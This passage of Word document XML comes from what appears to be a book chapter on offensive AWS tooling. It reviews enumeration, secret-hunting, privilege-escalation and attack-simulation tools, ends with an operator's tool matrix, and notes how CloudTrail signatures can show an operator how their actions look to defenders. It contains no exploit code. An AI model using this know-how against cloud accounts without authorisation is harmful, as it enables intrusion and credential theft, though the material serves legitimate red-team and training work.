          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>role-trusts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam-simulator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>outbound-assumed-roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. The output is text, grep-able, and designed to be read by humans rather than exported to a BI tool. If only one enumeration tool is installed, it should be CloudFox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A642A0E"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Pacu.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Rhino Security Labs project. Pacu is less a reconnaissance tool than a framework: a Python shell with modules for enumeration, privilege escalation, and exploitation. Its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__privesc_scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> module automates the 30+ privilege-escalation primitives from Chapter 8; its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__enum_permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> module produces a more exhaustive permission map than brute-force </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws iam simulate-principal-policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls. Pacu is at its best on long-running engagements where the operator returns to the shell repeatedly over days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE400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ScoutSuite.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A NCC Group project. ScoutSuite produces HTML-rendered compliance-style audit reports from a read-only scan of an AWS account. In an offensive context, it is most useful as a misconfiguration backlog generator: run it, ingest the findings, and cross-reference with your own exploitation hypotheses. Its S3 bucket policy analysis and IAM policy analysis modules are particularly useful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADAA6A1"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Prowler.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A CIS-benchmark / AWS-Foundational-Security-Best-Practices driven audit tool; open-source (originally by Toni de la Fuente). Prowler's offensive-value is its broad coverage of compliance misconfigurations that correlate with exploitable conditions — public S3, open security groups, unrotated keys, overly-permissive resource policies. Prowler's 3.x / 4.x branches accept custom checks written in Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11374BE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PMapper (Principal Mapper).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A NCC Group project. PMapper builds a graph of IAM principals and edges (what-can-assume-what, what-can-escalate-to-what) and lets the operator query it with Gremlin-like queries. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Can user Alice reach role BuildAdmin?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a PMapper query, and the answer includes the path. PMapper is indispensable for complex IAM environments where the raw policy text is no longer human-readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116889FC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>18.2  Secret hunting and credential discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282359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TruffleHog.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The canonical Git-secret scanner; v3.x added AWS-specific detectors and a live-verification mode that tests each candidate credential against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:GetCallerIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> before reporting. Live verification reduces false-positive volume dramatically and is worth enabling on every run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084E4EF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Gitleaks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A secondary option. Its ruleset is competitive with TruffleHog's and it is slightly faster on very large repositories; it does not verify credentials against AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3888F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Noseyparker.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A third option, with a unique architecture: it builds a persistent content-addressable store of scanned blobs, which makes repeat scans across the engagement much faster. Appropriate for organizations with dozens of large repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC2647"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s3enum / S3Scanner.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Two tools for unauthenticated S3 bucket discovery; useful pre-engagement to produce a candidate list of bucket names for an organization before any credentials are held.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C855FDC"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quiet-riot.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A lightweight role-name brute-forcer. Queries </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with candidate role ARNs and observes the error code to distinguish existing-role from no-such-role. Good for IAM enumeration when only a limited set of credentials is held.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BB74AF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>18.3  Exploitation and post-exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4978176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aws-vault.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential manager with IAM role support. Not an attack tool, but its ability to scope, chain, and cache STS credentials makes it a better operational wrapper around </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> than shell environment variables. Every example in this book is easier to operate out of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-vault exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F274667"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Stratus Red Team.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Datadog project. Stratus is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>simulator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: it executes red-team techniques against a target AWS account to produce the telemetry the defender would need to detect the technique. In an offensive context, Stratus's value is reversed: it is a catalogue of CloudTrail signatures for common attacks, which the operator can study to understand how their planned actions will look to a detection engineer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C4B1C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CloudGoat / IAM Vulnerable / AWSGoat / TerraGoat.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Four open-source vulnerable-by-design AWS labs covering, respectively, Pacu-tuned scenarios, IAM primitives, multi-service exploitation paths, and Terraform misconfigurations. These are the industry standard for practice; every chapter in this book has at least one exercise that can be reproduced in one or more of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E55A17"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enumerate-iam.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Offers a "brute-force enumerate" mode that iterates through a list of AWS API actions and tests each with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dry-run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or equivalent. It produces an exhaustive permission map from minimal starting credentials, though at the cost of a very noisy CloudTrail trail (thousands of events).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBDF7AC"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Leonidas.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A FSecure project. Leonidas is a Python framework for AWS-attack simulation with a large built-in library of techniques, each annotated with CloudTrail signatures. Comparable to Stratus Red Team but with different technique coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD38115" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>18.4  A curated tool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3023"/>
        <w:gridCol w:w="3856"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="75C3E0E1" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C0C0FB7"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18.1 — Operator's tool matrix. The primary recommendation is the tool the operator should reach for first in each category; the secondary is a useful backup or complement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="25406570" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76970C40"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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BBDDE7A"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Primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E0C9F19"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Secondary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="4C26264F" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32804DF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Opinionated enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3C7D4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CloudFox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E9F30F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Pacu (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam__enum_permissions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="4ED96B69" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E986F7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Audit-style enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68F97FC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ScoutSuite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A8A54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Prowler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3396A22A" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05FA741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 graph reasoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74443AC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PMapper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="788F7C0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Access Analyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="00C69694" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34D7FBF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Secret scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE9792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TruffleHog v3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03DAED1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Gitleaks, Noseyparker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="16063EE7" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D8B4B9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Role-name brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43E0811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quiet-riot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16C4C6A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enumerate-iam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="08D62254" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A7E0E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 discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B6C1EF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S3Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DEBC44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s3enum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7AC01D20" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19EFA31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Credential wrapper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19509A8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aws-vault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4443DE9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Leapp, granted.dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="04BE5236" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="372A4AA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Privesc automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C7E2C5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 xml:space="preserve">Pacu </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam__privesc_scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F784A1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PMapper custom queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="76992025" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1464818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Detection modeling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ECA4D2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Stratus Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61FE5F4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Leonidas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="49C73719" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B731BF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Practice range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
